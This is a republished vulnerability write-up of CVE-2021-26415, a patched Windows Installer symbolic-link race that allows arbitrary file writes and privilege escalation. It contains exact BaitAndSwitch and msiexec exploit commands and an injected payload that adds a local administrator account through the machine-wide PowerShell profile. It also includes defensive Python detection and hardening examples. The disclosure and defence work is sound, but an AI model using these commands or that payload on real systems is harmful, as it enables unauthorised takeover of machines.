How to analyze CVE-2021-26415 vulnerability of arbitrary File Writing in Windows Installer

2025-01-20 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)05/31 Report--

In this issue the editor presents an analysis of CVE-2021-26415, an arbitrary file write vulnerability in Windows Installer. The article is rich in content and describes the issue from a professional point of view; I hope you will get something out of it.

CVE ID: CVE-2021-26415
CVSS score: 7.3 (AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H)
Affected vendor: Microsoft
Affected product: Windows

Vulnerability details: This vulnerability allows a local attacker to write data to arbitrary files on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the Windows Installer service. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of Administrator.

Additional details: Microsoft has issued an update to correct this vulnerability. More details can be found at msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26415

Disclosure timeline:
2020-12-16 - Vulnerability reported to vendor
2021-04-15 - Coordinated public release of advisory

* The vulnerabilities discussed in this article have been reported to the vendor and fixed. This article is limited to technical research and discussion; illegal use is strictly prohibited, and anyone who does so bears all consequences themselves.

This is a local privilege escalation (LPE) vulnerability affecting the Windows Installer component. It is based on a TOCTOU (time-of-check to time-of-use) race and a file system attack using symbolic links. The issue results in a write to an arbitrary file with LocalSystem privileges and partial control over the content. I could not find a vector with complete control over the content (to replace the contents of a DLL file, etc.), but even partial control is enough to inject arbitrary PowerShell commands into the default profile, which then run when an administrator account opens a PowerShell console or when a scheduled task runs PowerShell with elevated privileges.

I reported the issue against Windows 10 and Server 2019 as a 0-day, but according to the advisory it also affects other systems: 8.1, 7, 2012, 2016, 2008. Older systems may be vulnerable as well.

Technical details

Windows Installer

The msiexec system binary is used to install applications from MSI packages (Windows Installer packages). MSI is not merely another name for a PE file; it is a somewhat more complex format. Typical use of msiexec requires administrative privileges, but there are exceptions. For example, the /f switch can be used by a non-privileged user to perform a repair operation, which can usually be done without any administrator privileges. In the past this switch has been used in a variety of LPE attacks, where the vulnerable component was usually the MSI package itself. Typically, to find such an MSI, I simply go to the C:\Windows\Installer directory and start from there. This time we will take just one existing file and use it to attack the operating system itself. The second-hand installer (148d3c4.msi) is some random Dropbox MSI I found on the system.

The repair operation can be extended with logging via the /L option; msiexec then records some information to the log file given on the command line. Let's use procmon to see what happens when a normal user executes the following command:

msiexec /f C:\Windows\Installer\148d3c4.msi /L C:\temp\foo.log

In the figure above you can see the configured filters and highlighting. They help to visually distinguish operations that run at System integrity level while impersonating the ordinary user from those that use the full token. For example, the initial CreateFile operation on the log file is performed under impersonation. That step does not open anything we could not access ourselves: we cannot simply point it at another file (such as C:\Windows\win.ini) and rely on elevated access. It will not work, and from an LPE point of view it is not interesting.

In the following lines the file is processed again, but this time with the full LocalSystem token. Perhaps only the initial access to the file is protected? We can test this using symbolic links.
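The pattern just described in the procmon trace (an access check under the caller's impersonated token, followed by a write to the same path with the service's own token) can be looked for mechanically in a Process Monitor CSV export. The following is an added example, not from the original write-up: the CSV rows are constructed to mirror the trace described above, using Process Monitor's export column layout with the optional User and Integrity columns enabled, and relying on the "Impersonating: <account>" text Process Monitor places in the Detail column for impersonated operations. PID, timestamps and offsets are illustrative.

```python
"""Find check-then-use across a token boundary in a Process Monitor CSV export.

Added example; the sample export below is constructed, not captured.
"""
import csv
import io
import re
from collections import defaultdict

# Constructed sample in Process Monitor CSV export layout (User and Integrity columns enabled).
SAMPLE_CSV = '''"Time of Day","Process Name","PID","Operation","Path","Result","Detail","User","Integrity"
"8:14:03.1001","msiexec.exe","4120","CreateFile","C:\\temp\\linkdir\\link","SUCCESS","Desired Access: Generic Write, Read Attributes, Disposition: OpenIf, Impersonating: DESKTOP-OMNIO40\\lowpriv","NT AUTHORITY\\SYSTEM","System"
"8:14:03.1004","msiexec.exe","4120","WriteFile","C:\\temp\\linkdir\\link","SUCCESS","Offset: 0, Length: 2, Impersonating: DESKTOP-OMNIO40\\lowpriv","NT AUTHORITY\\SYSTEM","System"
"8:14:03.1005","msiexec.exe","4120","CloseFile","C:\\temp\\linkdir\\link","SUCCESS","","NT AUTHORITY\\SYSTEM","System"
"8:14:03.2300","msiexec.exe","4120","CreateFile","C:\\temp\\linkdir\\link","SUCCESS","Desired Access: Generic Write, Read Attributes, Disposition: OpenIf","NT AUTHORITY\\SYSTEM","System"
"8:14:03.2310","msiexec.exe","4120","WriteFile","C:\\temp\\linkdir\\link","SUCCESS","Offset: 2, Length: 312","NT AUTHORITY\\SYSTEM","System"
"8:14:03.2400","msiexec.exe","4120","CreateFile","C:\\Windows\\Installer\\148d3c4.msi","SUCCESS","Desired Access: Generic Read","NT AUTHORITY\\SYSTEM","System"
'''

IMPERSONATING = re.compile(r"Impersonating: (\S+)")
# Operations that modify the file a path points to.
WRITE_OPS = {"CreateFile", "WriteFile", "SetRenameInformationFile", "SetDispositionInformationFile"}


def find_token_boundary_writes(csv_text):
    """Return (path, impersonated_account, operation) tuples where a process
    running at System/High integrity first touched a path while impersonating
    a caller and later wrote to the same path with its own token."""
    impersonated = defaultdict(set)   # (pid, path) -> accounts impersonated for it
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        key = (row["PID"], row["Path"])
        match = IMPERSONATING.search(row["Detail"])
        if match:
            impersonated[key].add(match.group(1))   # the "check" side of the race
            continue
        if row["Operation"] not in WRITE_OPS or not impersonated.get(key):
            continue
        if row["Integrity"] not in ("System", "High"):
            continue
        if row["Operation"] == "CreateFile" and "Write" not in row["Detail"]:
            continue   # a read-only re-open is not a write primitive
        for account in sorted(impersonated[key]):
            findings.append((row["Path"], account, row["Operation"]))
    return findings


if __name__ == "__main__":
    for path, account, op in find_token_boundary_writes(SAMPLE_CSV):
        print("%s re-%s with full token after impersonated access as %s" % (path, op, account))
```

On a real export the interesting hits are the ones where the path lies in a directory the impersonated account can write to (a profile or temp directory), since that is where a link can be planted; a write-capable re-open there from a System-integrity process is the primitive this article is about.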

Symbolic link attack

I won't cover symbolic links in detail; if you're not familiar with the concept, check out an excellent introduction to the abuse of Windows privileged file operations.

James Forshaw's symbolic link testing tools are the de facto standard for exploiting this and similar issues. In particular, the BaitAndSwitch.exe tool does everything needed here: it catches the initial file check with an oplock and then switches the link from the original file to a different location, the target file. The initial permission check verifies access to the safe file, but the subsequent read/write goes to another file (now pointed to by the same symbolic link). This is a typical TOCTOU problem. The kind of symbolic link used here does not require any special access; any unprivileged user can create one.

Let's execute the following commands:

BaitAndSwitch.exe C:\temp\linkdir\link C:\temp\foo.log C:\foo.log
msiexec /f C:\Windows\Installer\148d3c4.msi /L C:\temp\linkdir\link

This is the initial file access, in which the byte order mark (BOM) is written from a medium-integrity thread; it also validates access to the file. Once that is confirmed, BaitAndSwitch triggers and changes the location the link points to.

Do you see it? The symbolic link has been switched to the new target (C:\foo.log), and after a bunch of operations under impersonation, a CreateFile is issued from LocalSystem. After a few more operations the file is closed and ends up saved on disk.

The file follows the existing access rules, so no additional permissions are granted, but we have only demonstrated an arbitrary write. What's inside?
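The root cause, restated from the defender's side: the service checks a user-supplied path under one token and then resolves the same path again under another, and a link swapped in between redirects the second resolution. The following is an added example, not from the original write-up, modelling that on POSIX in a temporary directory with helper names of my own: `vulnerable_open_log` checks by path and opens by path (the `race_hook` stands in for BaitAndSwitch's oplock-timed swap), while `hardened_open_log` walks the path from an open directory handle with `O_NOFOLLOW` at every component, so there is no second resolution for a link to hijack. On Windows the corresponding approach is to open each component with FILE_FLAG_OPEN_REPARSE_POINT (or relative NtOpenFile calls) and perform all checks on the resulting handle.

```python
"""Check-by-path-then-open versus open-once-without-following-links.

Added example, POSIX-only (dir_fd, O_DIRECTORY, O_NOFOLLOW); hypothetical helper names.
"""
import errno
import os
import tempfile


def vulnerable_open_log(path, user_dir, race_hook=None):
    """TOCTOU: resolve `path` and verify the target lies in the caller's own
    directory (the 'impersonated' access check), then open the path again,
    following whatever the link points to *now*."""
    user_real = os.path.realpath(user_dir)
    resolved = os.path.realpath(path)
    if os.path.commonpath([resolved, user_real]) != user_real:
        raise PermissionError("check failed: target outside caller's directory")
    if race_hook is not None:
        race_hook()   # the window BaitAndSwitch exploits: the link target changes here
    return os.open(path, os.O_WRONLY | os.O_CREAT | os.O_APPEND, 0o600)


def hardened_open_log(base_dir, rel_path):
    """Walk `rel_path` from an open directory handle one component at a time,
    refusing to follow a link at any step, and open the leaf the same way.
    Nothing is resolved by path a second time, so a swapped link cannot
    redirect the write."""
    parts = [p for p in rel_path.replace("\\", "/").split("/") if p not in ("", ".")]
    if not parts or ".." in parts:
        raise PermissionError("refusing empty or parent-relative path")
    dfd = os.open(base_dir, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW)
    try:
        for component in parts[:-1]:
            next_fd = os.open(component, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW, dir_fd=dfd)
            os.close(dfd)
            dfd = next_fd
        # A symlink leaf fails here with ELOOP instead of being followed.
        return os.open(parts[-1], os.O_WRONLY | os.O_CREAT | os.O_APPEND | os.O_NOFOLLOW, 0o600, dir_fd=dfd)
    finally:
        os.close(dfd)


def demo():
    """Recreate the link swap in a temp dir and report what each opener did."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        user_dir = os.path.join(tmp, "users", "lowpriv")   # stands in for the caller's profile
        os.makedirs(user_dir)
        victim = os.path.join(tmp, "foo.log")              # stands in for C:\foo.log
        decoy = os.path.join(user_dir, "foo.log")          # the file the check sees
        link = os.path.join(user_dir, "link")              # stands in for C:\temp\linkdir\link
        for p in (victim, decoy):
            open(p, "w").close()
        os.symlink(decoy, link)

        def swap_link():
            os.unlink(link)
            os.symlink(victim, link)

        fd = vulnerable_open_log(link, user_dir, race_hook=swap_link)
        os.write(fd, b"injected\n")
        os.close(fd)
        results["vulnerable_wrote_outside_user_dir"] = os.path.getsize(victim) > 0

        try:
            hardened_open_log(user_dir, "link")
            results["hardened"] = "wrote"
        except OSError as exc:
            results["hardened"] = "refused:" + errno.errorcode.get(exc.errno, "?")

        fd = hardened_open_log(user_dir, "real.log")       # an honest path still works
        os.write(fd, b"ok\n")
        os.close(fd)
        results["hardened_legit_wrote"] = os.path.getsize(os.path.join(user_dir, "real.log")) > 0
    return results


if __name__ == "__main__":
    print(demo())
```

The hardened variant refuses any link rather than trying to decide whether its target is acceptable; for a log file a privileged service writes on a user's behalf, that is the right trade, because a path the user controls is exactly where a link can be planted.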

MSI (s) (AC:34) [16:14:11:...]: Configuration completed successfully.
MSI (s) (AC:34) [16:14:11:...]: Windows Installer reconfigured the product. Product Name: Dropbox Update Helper. Product Version: 1.3.415.1. Product Language: 1033. Manufacturer: Dropbox, Inc.. Reconfiguration success or error status: 0.

Well, that's useless. We could overwrite important files, but that alone won't elevate privileges. We'll have to work harder for this.

Partial content control

At this point I started going through the flags listed by msiexec /h. Could it be possible to gain full, or at least partial, control over the written data?

There are some good candidates among the logging option parameters:

/Lp logs terminal properties, some of which are absolutely under my control because they come from user-writable registry hives or environment variables. For example, see how ;notepad.exe; injected into the %APPDATA% variable shows up in the log.

=== Logging started: 4/15/2021  20:18:09 ===
Property(S): UpdateDir = C:\Program Files (x86)\Dropbox\Update\
Property(S): DropboxProgramDir = C:\Program Files (x86)\Dropbox\
Property(S): ProgramFilesFolder = C:\Program Files (x86)\
Property(S): TARGETDIR = C:\
Property(S): ALLUSERS = 1
Property(S): ARPSYSTEMCOMPONENT = 1
Property(S): DISABLEROLLBACK = 1
Property(S): Manufacturer = Dropbox, Inc.
Property(S): ProductCode = {099218A5-A723-43DC-8DB5-6173656A1E94}
Property(S): ProductLanguage = 1033
Property(S): ProductName = Dropbox Update Helper
Property(S): ProductVersion = 1.3.415.1
Property(S): UpgradeCode = {C7A2CC6E-044B-4A2C-BD1E-E75EAD2C11B0}
Property(S): MsiLogFileLocation = C:\temp\log.txt
Property(S): PackageCode = {E42CA6BD-944C-4847-A481-D150906EC78E}
Property(S): ProductState = 5
Property(S): ProductToBeRegistered = 1
Property(S): RestrictedUserControl = 1
Property(S): REINSTALL = ALL
Property(S): REINSTALLMODE = pecms
Property(S): CURRENTDIRECTORY = C:\Users\lowpriv
Property(S): CLIENTUILEVEL = 2
Property(S): CLIENTPROCESSID = 12412
Property(S): MsiSystemRebootPending = 1
Property(S): PRODUCTLANGUAGE = 1033
Property(S): VersionDatabase = 300
Property(S): VersionMsi = 5.00
Property(S): VersionNT = 603
Property(S): VersionNT64 = 603
Property(S): WindowsBuild = 9600
Property(S): ServicePackLevel = 0
Property(S): ServicePackLevelMinor = 0
Property(S): MsiNTProductType = 1
Property(S): WindowsFolder = C:\WINDOWS\
Property(S): WindowsVolume = C:\
Property(S): System64Folder = C:\WINDOWS\system32\
Property(S): SystemFolder = C:\WINDOWS\SysWOW64\
Property(S): RemoteAdminTS = 1
Property(S): TempFolder = C:\Users\lowpriv\AppData\Local\Temp\
Property(S): CommonFilesFolder = C:\Program Files (x86)\Common Files\
Property(S): ProgramFiles64Folder = C:\Program Files\
Property(S): CommonFiles64Folder = C:\Program Files\Common Files\
Property(S): AppDataFolder = C:\Users\lowpriv\AppData\Roaming;notepad.exe;\
Property(S): FavoritesFolder = C:\Users\lowpriv\Favorites\
Property(S): NetHoodFolder = C:\Users\lowpriv\AppData\Roaming\Microsoft\Windows\Network Shortcuts\
Property(S): PersonalFolder = C:\Users\lowpriv\Documents\
Property(S): PrintHoodFolder = C:\Users\lowpriv\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\
Property(S): RecentFolder = C:\Users\lowpriv\AppData\Roaming\Microsoft\Windows\Recent\
Property(S): SendToFolder = C:\Users\lowpriv\AppData\Roaming\Microsoft\Windows\SendTo\
Property(S): TemplateFolder = C:\ProgramData\Microsoft\Windows\Templates\
Property(S): CommonAppDataFolder = C:\ProgramData\
Property(S): LocalAppDataFolder = C:\Users\lowpriv\AppData\Local\
Property(S): MyPicturesFolder = C:\Users\lowpriv\Pictures\
Property(S): AdminToolsFolder = C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\
Property(S): StartupFolder = C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
Property(S): ProgramMenuFolder = C:\ProgramData\Microsoft\Windows\Start Menu\Programs\
Property(S): StartMenuFolder = C:\ProgramData\Microsoft\Windows\Start Menu\
Property(S): DesktopFolder = C:\Users\Public\Desktop\
Property(S): FontsFolder = C:\WINDOWS\Fonts\
Property(S): GPTSupport = 1
Property(S): OLEAdvtSupport = 1
Property(S): ShellAdvtSupport = 1
Property(S): MsiAMD64 = 6
Property(S): Msix64 = 6
Property(S): Intel = 6
Property(S): PhysicalMemory = 5687
Property(S): VirtualMemory = 2713
Property(S): LogonUser = lowpriv
Property(S): UserSID = S-1-5-21-2746136434-3241333796-1554539884-1002
Property(S): UserLanguageID = 1033
Property(S): ComputerName = DESKTOP-OMNIO40
Property(S): SystemLanguageID = 1033
Property(S): ScreenX = 1024
Property(S): ScreenY = 768
Property(S): CaptionHeight = 19
Property(S): BorderTop = 1
Property(S): BorderSide = 1
Property(S): TextHeight = 16
Property(S): TextInternalLeading = 3
Property(S): ColorBits = 32
Property(S): TTCSupport = 1
Property(S): Time = 20:18:09
Property(S): Date = 4/15/2021
Property(S): MsiNetAssemblySupport = 4.8.4084.0
Property(S): MsiWin32AssemblySupport = 6.3.19041.1
Property(S): RedirectedDllSupport = 2
Property(S): AdminUser = 1
Property(S): MsiRunningElevated = 1
Property(S): Privileged = 1
Property(S): USERNAME = Adrian
Property(S): Installed = 00:00:00
Property(S): DATABASE = C:\WINDOWS\Installer\148d3c4.msi
Property(S): OriginalDatabase = C:\WINDOWS\Installer\148d3c4.msi
Property(S): RollbackDisabled = 1
Property(S): UILevel = 3
Property(S): Preselected = 1
Property(S): ACTION = INSTALL
Property(S): ROOTDRIVE = C:\
Property(S): CostingComplete = 1
Property(S): OutOfDiskSpace = 0
Property(S): OutOfNoRbDiskSpace = 0
Property(S): PrimaryVolumeSpaceAvailable = 0
Property(S): PrimaryVolumeSpaceRequired = 0
Property(S): PrimaryVolumeSpaceRemaining = 0
Property(S): INSTALLLEVEL = 1
=== Logging stopped: 4/15/2021  20:18:09 ===

If you don't yet see why this might be useful, I'll explain it in a second. For now, there is a lot of rubbish in the output. Let's try harder.

/L+

Appends rather than overwrites. This can be useful in some cases and lets us test attacks without destroying the whole file.

/Lc

Logs only the initial UI parameters. This results in only two lines of output, none of it under the attacker's control.

=== Logging started: 4/15/2021  20:28:50 ===
=== Logging stopped: 4/15/2021  20:28:50 ===

The other logging flags don't help much, and some even make MSI use multiple threads, which may cause other problems. Some log lengthy messages, others only errors. Perhaps a malicious MSI package would give more control over the content? Sounds like a good idea. Let's prepare a custom one.

Making an MSI

Custom MSI packages can be built with the WiX toolset. This way we control the behavior and other properties of the MSI package.

First, we need to create an example.wxs file with the following:

Note the Name attribute. It contains the injected PowerShell commands, separated by ";". The "#" at the end comments out the rest of the characters on the line. This will become clearer later.

Now we can process the above definition with candle.exe example.wxs and then run light example.wixobj to create the example.msi package.

Let's move it to the attacked system and redo the attack:

msiexec /f C:\temp\example.msi /L C:\temp\log.txt

Oops. This won't work: we need to install the package first, which obviously requires administrator privileges. Let's not even start down the social-engineering path. This is a dead end.

Product advertisement

I decided to test the other flags; maybe repair is not the only interesting trigger. The /j option is used to advertise a product: m for all users, u for the current user. Let's see what it really does:

BaitAndSwitch C:\temp\linkdir\link C:\temp\fakelog.txt C:\foo.log
msiexec /j example.msi /L C:\temp\linkdir\link

A UAC prompt. So it has to be admin after all... However, if we look at procmon, it looks like a write has already taken place.

We don't need to provide any credentials at all! At this point we can safely cancel the UAC prompt; the write has already happened! Attacker-controlled data is appended to the target file, and we can perform an arbitrary write with partial content control.

Final touches

The C:\foo.log file now contains:

MSI (s) (58:68) [21:...:20]: Product: ;net user FooBar P@ssw0rd /add; net localgroup Administrators FooBar /add # -- Advertisement failed.

Did I mention that this is a UTF-16 file? All right. So it cannot be turned into a cmd.exe payload, but PowerShell will happily process the file. Semicolons are used to separate commands, and the rest of the text is commented out with the hash character.

If you overwrite (or create) C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1, the payload will run the next time an administrator starts PowerShell. Other locations would also work for LPE, but finding other vectors is left as homework.

Another issue I wanted to solve was getting rid of the UAC prompt altogether. For that, another switch is used: /t somevalue /qn, which triggers a silent error after the write but before the UAC prompt. We deliberately want the installer to fail at an early stage. The /qn switch guarantees no UI. So the payload can be planted even without GUI access to the system; nothing prevents doing it from a console.
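The artefact this technique leaves behind is distinctive: a machine-wide PowerShell profile that is really a Windows Installer log, UTF-16 LE with a byte order mark, whose lines start with "MSI (s)" or "MSI (c)", a thread id and a bracketed timestamp, as the two log excerpts above show. The following is an added example, not from the original write-up: it decodes a profile script honouring its BOM and flags installer-log markers. The second machine-wide path is the host-specific profile PowerShell also loads for every user; the two sample files are constructed in a temporary directory, with a harmless Write-Host standing in for a payload.

```python
"""Inspect machine-wide PowerShell profile scripts for Windows Installer log debris.

Added example; the profile files in demo() are constructed, not taken from a system.
"""
import os
import re
import tempfile

# Profile scripts Windows PowerShell runs for every user on the machine.
MACHINE_PROFILE_PATHS = [
    r"C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1",
]

# "MSI (s) (58:68) [" : server/client marker, hex thread id, start of timestamp.
MSI_LOG_LINE = re.compile(r"^MSI \([sc]\) \([0-9A-Fa-f]{2}:[0-9A-Fa-f]{2}\) \[", re.MULTILINE)
LOG_BANNER = re.compile(r"=== Logging (?:started|stopped):")


def decode_with_bom(raw):
    """Return (encoding, text), honouring a leading byte order mark."""
    if raw.startswith(b"\xff\xfe"):
        return "utf-16-le", raw[2:].decode("utf-16-le", errors="replace")
    if raw.startswith(b"\xfe\xff"):
        return "utf-16-be", raw[2:].decode("utf-16-be", errors="replace")
    if raw.startswith(b"\xef\xbb\xbf"):
        return "utf-8-sig", raw[3:].decode("utf-8", errors="replace")
    return "utf-8", raw.decode("utf-8", errors="replace")


def inspect_profile(path):
    """Say whether one profile script looks like Windows Installer log output."""
    with open(path, "rb") as f:
        raw = f.read()
    encoding, text = decode_with_bom(raw)
    msi_lines = MSI_LOG_LINE.findall(text)
    reasons = []
    if msi_lines:
        reasons.append("%d Windows Installer log line(s)" % len(msi_lines))
    if LOG_BANNER.search(text):
        reasons.append("installer logging banner")
    if msi_lines and re.search(r";[^\n]*#", text):
        # ';' separators with a trailing '#' comment on a log line are the
        # shape of the injected content described above.
        reasons.append("command separators and trailing comment on a log line")
    return {"path": path, "encoding": encoding, "suspicious": bool(reasons), "reasons": reasons}


def scan(paths=MACHINE_PROFILE_PATHS):
    """Inspect every existing profile in `paths`; missing files are skipped."""
    return [inspect_profile(p) for p in paths if os.path.isfile(p)]


def demo():
    """Two constructed profiles: a benign one and one that is an installer log
    line carrying a harmless stand-in command instead of a payload."""
    with tempfile.TemporaryDirectory() as tmp:
        benign = os.path.join(tmp, "profile.ps1")
        with open(benign, "w", encoding="utf-8") as f:
            f.write("Set-Location C:\\\nfunction prompt { 'PS> ' }\n")
        planted = os.path.join(tmp, "Microsoft.PowerShell_profile.ps1")
        line = "MSI (s) (58:68) [21:19:20:000]: Product: ;Write-Host injected; # -- Advertisement failed.\r\n"
        with open(planted, "wb") as f:
            f.write(b"\xff\xfe" + line.encode("utf-16-le"))   # UTF-16 LE with BOM, as msiexec writes
        return scan([benign, planted])


if __name__ == "__main__":
    for result in demo():
        print(result)
```

Pair this with file-creation auditing (or an EDR rule) on the v1.0 profile directory: the all-users profile is normally absent, so its appearance, especially as a UTF-16 file written by a System-integrity process, is itself the signal.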

The above is what the editor has shared on how to analyze the Windows Installer arbitrary file write vulnerability CVE-2021-26415. If you happen to have similar questions, you may refer to the above analysis. If you want to know more, you are welcome to follow the industry information channel.
